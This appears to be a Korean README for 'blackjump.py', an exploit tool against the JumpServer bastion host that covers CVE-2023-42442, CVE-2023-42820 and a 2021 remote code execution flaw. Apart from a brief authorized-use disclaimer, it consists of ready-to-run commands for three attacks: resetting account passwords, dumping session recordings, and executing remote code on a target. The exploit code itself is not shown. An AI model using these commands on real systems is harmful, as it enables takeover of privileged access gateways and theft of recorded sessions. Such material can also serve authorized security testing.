
JumpServer 배스천 호스트 무단 종합 취약점 악용, CVE-2023-42442 / CVE-2023-42820 / RCE 2021 익스플로잇
면책 조항: 본 도구는 합법적으로 승인된 기업 보안 구축 활동만을 대상으로 하며, 본 도구를 사용하여 검사를 수행할 때 해당 행위가 현지 법규를 준수하고 충분한 승인을 받았는지 확인해야 합니다. 승인되지 않은 대상에 대해 사용하지 마십시오.
본 도구를 사용하는 과정에서 불법 행위가 발생할 경우, 해당 결과에 대한 책임은 사용자 본인에게 있으며, 당사는 법적 책임을 포함한 어떠한 책임도 지지 않습니다.
JumpServer 배스천 호스트 종합 취약점 활용
python3 -m pip install -r requirements.txt
--user 및 --email 매개변수를 지정할 수 있습니다python3 blackjump.py reset https://vulerability

output/ 디렉토리의 <uuid4>.tar 파일을 jumpserver 플레이어로 재생하면 됩니다python3 blackjump.py dump https://vulerability
e
python3 blackjump.py rce http(s)://vulerability

python3 blackjump.py {reset,dump,rce} -h